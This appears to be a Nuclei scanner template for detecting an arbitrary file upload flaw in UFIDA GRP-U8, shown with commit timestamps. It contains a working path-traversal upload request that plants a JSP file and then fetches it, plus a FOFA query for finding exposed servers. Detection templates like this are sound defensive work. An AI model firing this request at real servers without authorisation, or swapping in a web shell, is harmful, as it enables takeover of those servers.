2023-09-15 12:23:57 +00:00
id : grp-u8-uploadfiledata
2023-08-18 03:22:06 +00:00
info :
2023-09-15 12:23:57 +00:00
name : UFIDA GRP-U8 UploadFileData - Arbitrary File Upload
2023-08-18 03:22:06 +00:00
author : SleepingBag945
severity : critical
2023-09-15 12:23:57 +00:00
description : |
File upload vulnerability in UFIDA U8+ERP customer relationship management software. An attacker can use this vulnerability to gain control of the server.
2023-08-18 03:22:06 +00:00
reference :
2023-09-15 12:23:57 +00:00
- https://mp.weixin.qq.com/s/DZXFxLC7fFKbPUWrdyITag
metadata :
2023-10-14 11:27:55 +00:00
verified : true
2023-09-15 12:23:57 +00:00
max-request : 2
fofa-query : title="用友GRP-U8行政事业内控管理软件"
tags : yonyou,fileupload,grp,intrusive
2023-08-18 03:22:06 +00:00
http :
- raw :
- |
POST /UploadFileData?action=upload_file&filename=../{{randstr_1}}.jsp HTTP/1.1
2023-09-15 12:23:57 +00:00
Host : {{Hostname}}
2023-08-18 03:22:06 +00:00
Content-Length : 327
Accept : */*
Content-Type : multipart/form-data; boundary=----WebKitFormBoundaryqoqnjtcw
Accept-Encoding : gzip
------WebKitFormBoundaryqoqnjtcw
Content-Disposition : form-data; name="upload"; filename="emgeyr.jsp"
Content-Type : application/octet-stream
<% {out.print("{{randstr_2}}");} %>
------WebKitFormBoundaryqoqnjtcw
Content-Disposition : form-data; name="submit"
submit
------WebKitFormBoundaryqoqnjtcw--
- |
GET /R9iPortal/{{randstr_1}}.jsp HTTP/1.1
Host : {{Hostname}}
Accept-Encoding : gzip
matchers :
- type : dsl
dsl :
- "status_code_1 == 200 && contains(body_1,'showSucceedMsg')"
- "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
2023-10-14 11:27:55 +00:00
condition : and
2023-11-27 09:19:41 +00:00
# digest: 4a0a00473045022065622d9010a0899491ee909d944835b79a8f75e3a0c1843f5ab636b5353d1e8202210088c9c21a362c6f95b9c6fb4be62080f324980f636a36dfc0691d6519314d87da:922c64590222798bb761d5b6d8e72950
